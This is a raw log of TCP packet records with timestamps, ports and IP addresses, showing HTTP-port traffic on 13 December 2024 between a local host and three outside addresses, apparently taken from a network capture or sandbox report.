                                                          Dec 13, 2024 11:58:59.228400946 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.228451014 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.228519917 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.231331110 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.231378078 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.231488943 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.234500885 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.234548092 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.234678984 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.237895012 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.237943888 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.238023043 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.241022110 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.241065979 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.241142988 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.244673967 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.244721889 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.244788885 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.247773886 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.247822046 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.247889042 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.257397890 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.257473946 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.257508039 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.259819984 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.259869099 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.259944916 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.263427973 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.263508081 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.263557911 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.267748117 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.267806053 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.267865896 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.271651030 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.271711111 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.288423061 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.408288002 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.408356905 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.528259039 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.860690117 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.860727072 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.860771894 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.861279964 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.861376047 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.861427069 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.863297939 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.863409042 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.863452911 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.864918947 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.865073919 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.865124941 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.866966009 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.867084026 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.867134094 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.869009018 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.869126081 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.869178057 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.871068001 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.871176004 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.871233940 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.873136997 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.873193026 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.873239994 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.875160933 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.875272036 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.875328064 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.877171993 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.877299070 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.877357960 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.879340887 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.879441977 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.879484892 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.881411076 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.881541014 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.881592035 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.883393049 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.883511066 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.883593082 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.885433912 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.885571003 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.885622978 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.887425900 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.887531996 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.887588978 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.889473915 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.889595032 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.889646053 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.891710043 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.891824961 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.891875029 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.893579960 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.893672943 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.893739939 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.895710945 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.895775080 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.895827055 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.897679090 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.897780895 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.897830009 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.899746895 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.899806023 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.899857044 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.980813026 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.980890036 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.980957031 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.981606960 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.981759071 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.981812000 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.984894037 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.984977007 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.985028982 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.986995935 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.987054110 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.987212896 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.988956928 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.989023924 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.989094019 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.989989996 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.991039038 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.991077900 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.991095066 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.993136883 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.993176937 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.993210077 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.995073080 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.995162010 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.995404959 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.997139931 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.997190952 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.997236013 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.999232054 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.999278069 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.999396086 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.001354933 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.001380920 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.001414061 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.003343105 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.003396034 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.003453016 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.005395889 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.005490065 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.005508900 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.007368088 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.007437944 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.007462025 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.009380102 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.009428978 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.009529114 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.011792898 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.011846066 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.011856079 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.013484001 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.013559103 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.013606071 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.015621901 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.015686035 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.015734911 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.017546892 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.017595053 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.017644882 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.019582987 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.019619942 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.019633055 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.020984888 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.021045923 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.021073103 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.073385954 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.100924015 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.101049900 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.101157904 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.101761103 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.101846933 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.101895094 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.105104923 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.105235100 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.105282068 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.107028008 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.107095957 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.107146978 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.108756065 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.110831976 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.110913992 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.110913992 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.112896919 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.112950087 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.113003016 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.115129948 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.115181923 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.115212917 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.117017984 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.117069960 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.117096901 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.118952036 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.119005919 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.119069099 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.121105909 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.121150017 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.121161938 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.123110056 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.123162985 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.123245001 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.125235081 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.125293970 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.125293970 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.127198935 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.127262115 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.127305984 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.129163980 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.129230022 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.129237890 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.131536961 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.131594896 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.131650925 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.133665085 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.133719921 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.133822918 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.135488987 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.135549068 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.135552883 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.137284040 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.137331963 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.137408972 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.139354944 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.139410973 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.139445066 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.140743017 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.140790939 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.140829086 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.182769060 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.220947981 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.221035004 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.221108913 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.221894979 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.221992016 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.222068071 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.224961996 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.225055933 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.225110054 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.226845980 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.226957083 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.227001905 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.230736017 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.230875015 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.230921984 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.648951054 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.651786089 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.768771887 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.768868923 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.771670103 CET804970682.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.771750927 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.772866964 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:00.888762951 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:00.892533064 CET804970682.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:02.030386925 CET804970682.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:02.073365927 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:02.075869083 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:02.195657969 CET804970682.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:03.454088926 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:03.463174105 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:03.574136019 CET804970682.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:03.583564043 CET804970682.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:03.583688974 CET4970680192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:07.935070992 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:08.042099953 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:08.126600981 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:08.231353998 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:09.699675083 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:09.819564104 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:09.819657087 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:09.940659046 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:10.240109921 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:10.250485897 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:10.370392084 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:10.371031046 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:10.490830898 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:11.333179951 CET4971580192.168.2.883.147.52.247
                                                          Dec 13, 2024 11:59:11.452891111 CET804971583.147.52.247192.168.2.8
                                                          Dec 13, 2024 11:59:11.453232050 CET4971580192.168.2.883.147.52.247
                                                          Dec 13, 2024 11:59:11.972567081 CET4971680192.168.2.8193.122.130.0
                                                          Dec 13, 2024 11:59:12.092297077 CET8049716193.122.130.0192.168.2.8
                                                          Dec 13, 2024 11:59:12.092375040 CET4971680192.168.2.8193.122.130.0
                                                          Dec 13, 2024 11:59:12.092665911 CET4971680192.168.2.8193.122.130.0
                                                          Dec 13, 2024 11:59:12.212490082 CET8049716193.122.130.0192.168.2.8
                                                          Dec 13, 2024 11:59:13.188985109 CET8049716193.122.130.0192.168.2.8
                                                          Dec 13, 2024 11:59:13.190536022 CET4971580192.168.2.883.147.52.247
                                                          Dec 13, 2024 11:59:13.229644060 CET4971680192.168.2.8193.122.130.0
                                                          Dec 13, 2024 11:59:13.310672998 CET804971583.147.52.247192.168.2.8
                                                          Dec 13, 2024 11:59:13.310813904 CET4971580192.168.2.883.147.52.247
                                                          Dec 13, 2024 11:59:13.430535078 CET804971583.147.52.247192.168.2.8
                                                          Dec 13, 2024 11:59:23.042854071 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:23.162914991 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:23.163047075 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:23.282711029 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:23.569340944 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:23.620263100 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:23.761236906 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:23.763623953 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:23.883416891 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:23.883461952 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:24.003174067 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:36.386629105 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:36.506544113 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:36.506616116 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:36.626566887 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:36.917602062 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:36.964083910 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:37.109180927 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:37.151587009 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:37.171180964 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:37.295870066 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:37.295964956 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:37.416039944 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:37.954005957 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:37.996463060 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:38.145343065 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:38.198483944 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:49.745934010 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:49.865696907 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:49.865816116 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:49.985703945 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:50.280777931 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:50.283354044 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:50.403724909 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:59:50.408575058 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:59:50.528565884 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:03.091908932 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:03.211797953 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:03.211966991 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:03.331866026 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:03.632908106 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:03.682919979 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:03.825632095 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:03.848884106 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:03.968718052 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:03.968914032 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:04.091145992 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:07.934498072 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:07.979856968 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:08.126143932 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:08.167242050 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:16.453787088 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:16.576108932 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:16.576164961 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:16.696108103 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:16.984585047 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:16.986465931 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 12:00:17.108557940 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 12:00:17.108624935 CET4970480192.168.2.882.64.156.123
